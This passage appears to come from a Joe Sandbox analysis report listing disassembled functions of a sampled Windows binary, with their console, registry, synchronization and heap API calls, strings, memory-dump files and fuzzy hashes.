                                                • Part of subcall function 00007FF6EB183578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835D9
                                                • Part of subcall function 00007FF6EB183578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835ED
                                                • Part of subcall function 00007FF6EB183578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB183602
                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB183514
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB183522
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB183541
                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB18355E
                                                • Part of subcall function 00007FF6EB1836EC: _get_osfhandle.MSVCRT ref: 00007FF6EB183715
                                                • Part of subcall function 00007FF6EB1836EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6EB183770
                                                • Part of subcall function 00007FF6EB1836EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB183791
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                              • String ID:
                                              • API String ID: 4057327938-0
                                              • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                              • Instruction ID: 2f04be6e58ce9f1ba0da8e5cdd16aa84c554af790e6b767bdcd8d6bf17a8d7df
                                              • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                              • Instruction Fuzzy Hash: 38317423F0CA4296E7559B15B5003FDB6A0FF8E768F584135EA4EC33B5DE2EE4098609
                                              Function 00007FF6EB19711C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 175COMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6EB1971F9
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6EB19720D
                                              • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6EB197300
                                                • Part of subcall function 00007FF6EB195740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF6EB1975C4,?,?,00000000,00007FF6EB196999,?,?,?,?,?,00007FF6EB188C39), ref: 00007FF6EB195744
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: OpenSemaphore$CloseErrorHandleLast
                                              • String ID: _p0$wil
                                              • API String ID: 455305043-1814513734
                                              • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                              • Instruction ID: b95d8de379387da7ee697481f6f1b84c4455cffc913901586884205543c553e3
                                              • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                              • Instruction Fuzzy Hash: 0661A063B1878282EF258F6594103F963A1FF8CBA8F554431DA0E877A4EF3EE5048309
                                              Function 00007FF6EB19992C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6EB199A10
                                              • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB199994
                                                • Part of subcall function 00007FF6EB19A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A77A
                                                • Part of subcall function 00007FF6EB19A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A839
                                                • Part of subcall function 00007FF6EB19A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A850
                                              • wcsrchr.MSVCRT ref: 00007FF6EB199A62
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                              • String ID: %s=%s$.
                                              • API String ID: 3242694432-4275322459
                                              • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                              • Instruction ID: 887d1c95fbf232c98831d07d289e631fbe34dc26afc138d7314acaa646b48ace
                                              • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                              • Instruction Fuzzy Hash: 7941AE23A0978286EA149B11A5503FA62A0FF8E7F8F444234DD5D873E5EE7EE445870A
                                              Function 00007FF6EB1954B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 120synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6EB1954E6
                                              • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6EB19552E
                                                • Part of subcall function 00007FF6EB19758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6EB196999,?,?,?,?,?,00007FF6EB188C39), ref: 00007FF6EB1975AE
                                                • Part of subcall function 00007FF6EB19758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6EB196999,?,?,?,?,?,00007FF6EB188C39), ref: 00007FF6EB1975C6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ErrorLast$CreateCurrentMutexProcess
                                              • String ID: Local\SM0:%d:%d:%hs$wil$x
                                              • API String ID: 779401067-630742106
                                              • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                              • Instruction ID: d0c06a69acbce52fe55dd07fb9fec2443e9a3bfa5e98e2a942e682030011905c
                                              • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                              • Instruction Fuzzy Hash: A651A433A187C282EB219B11E4407FA6360FF8C7A8F404032EA4DDBA65DE3EE505C705
                                              Function 00007FF6EB1758D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                              • API String ID: 3677997916-3870813718
                                              • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                              • Instruction ID: c45c1574d6486c540680004834c3663f3f6a7829e90f1c8e84cb4cb73e1d3d6c
                                              • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                              • Instruction Fuzzy Hash: 0411F876619A41C6EA108B50E4847AAF7A4FB8A768F404625DA8D437B8DF7ED048CB05
                                              Function 00007FF6EB17B49C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 106COMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB17B4BD
                                                • Part of subcall function 00007FF6EB1806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB1806D6
                                                • Part of subcall function 00007FF6EB1806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB1806F0
                                                • Part of subcall function 00007FF6EB1806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB18074D
                                                • Part of subcall function 00007FF6EB1806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB17B4DB), ref: 00007FF6EB180762
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB17B518
                                              • _wcsicmp.MSVCRT ref: 00007FF6EB17B58B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$_wcsicmp$AllocProcess
                                              • String ID: ELSE$IF/?
                                              • API String ID: 3223794493-1134991328
                                              • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                              • Instruction ID: 4ecfd639badb7d7c9692d92befbe87bbdc9cd53240eb31668fe209f301d186b0
                                              • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                              • Instruction Fuzzy Hash: DE415823A0D66381FA549B24E4213FA26A1AF4E76CF585035DA0EC73F5DF7EE400874A
                                              Function 00007FF6EB19E3E8 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                              • String ID:
                                              • API String ID: 1532185241-0
                                              • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                              • Instruction ID: d27f550a367c2a04a06cbe0a77a67fc87a523bd2846daf9e8267f1c8b28af7e7
                                              • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                              • Instruction Fuzzy Hash: 3F41E433A0879187E7149B21E4457BD7AA1FB8CB64F448535EA0AC37A4CF3DE845CB05
                                              Function 00007FF6EB174FE8 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                              • String ID:
                                              • API String ID: 3588551418-0
                                              • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                              • Instruction ID: df1da2599e1a72d5a78126d29ae598be3ee3754598b874a64c328fba632621e8
                                              • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                              • Instruction Fuzzy Hash: D3419033A08242CBE7549B11E4503BDB661EF8DBA9F144039D60EC77A5CF7EE840874A
                                              Function 00007FF6EB19A73C Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A77A
                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A7AF
                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A80E
                                              • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A839
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6EB199A82), ref: 00007FF6EB19A850
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: QueryValue$CloseErrorLastOpen
                                              • String ID:
                                              • API String ID: 2240656346-0
                                              • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                              • Instruction ID: ffb029548c0d648dca5e797d9d3cdd78ca19362eb8a50b9959d5b0e6d4a9d468
                                              • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                              • Instruction Fuzzy Hash: 16318233628A8182E7508F15E4406B9B7A4FB8D7A4F544134EA4E83774DF3ED4498B45
                                              Function 00007FF6EB19D0C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00007FF6EB1801B8: _get_osfhandle.MSVCRT ref: 00007FF6EB1801C4
                                                • Part of subcall function 00007FF6EB1801B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6EB18E904,?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB1801D6
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6EB19D0F9
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6EB19D10F
                                              • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6EB19D166
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6EB19D17A
                                              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6EB19D18C
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                              • String ID:
                                              • API String ID: 3008996577-0
                                              • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                              • Instruction ID: d007d86092f68e37f942bcc0a1fec625e1ecc602c61e8193303210e364682e15
                                              • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                              • Instruction Fuzzy Hash: 9F214B27B14A51CAE7009BB1E4002FD77B0FB4DB68B445125EE0D93B68DF39E044CB19
                                              Function 00007FF6EB195770 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CreateSemaphore
                                              • String ID: _p0$wil
                                              • API String ID: 1078844751-1814513734
                                              • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                              • Instruction ID: 45008ca9652760eb1404079e97b845067e79f21fcac3388420307921d374a5ca
                                              • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                              • Instruction Fuzzy Hash: 15510663B197C286EE218F1584543F97290EF8CBA8FA44435DA0D977A5DF3EE405870A
                                              Function 00007FF6EB19FB54 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$DiskFreeSpace
                                              • String ID: %5lu
                                              • API String ID: 2448137811-2100233843
                                              • Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                              • Instruction ID: f8bab77daf7c69269cc75b6559e686c22f764331b37a0fd9f688e219f98dede5
                                              • Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                              • Instruction Fuzzy Hash: 14419123708AC195EB61DF11E8407EAB360FB89798F448036DA4D8B768DF7DD249CB05
                                              Function 00007FF6EB19B89C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF6EB19B934
                                              • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6EB185085), ref: 00007FF6EB19B9A5
                                              • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6EB185085), ref: 00007FF6EB19B9F7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
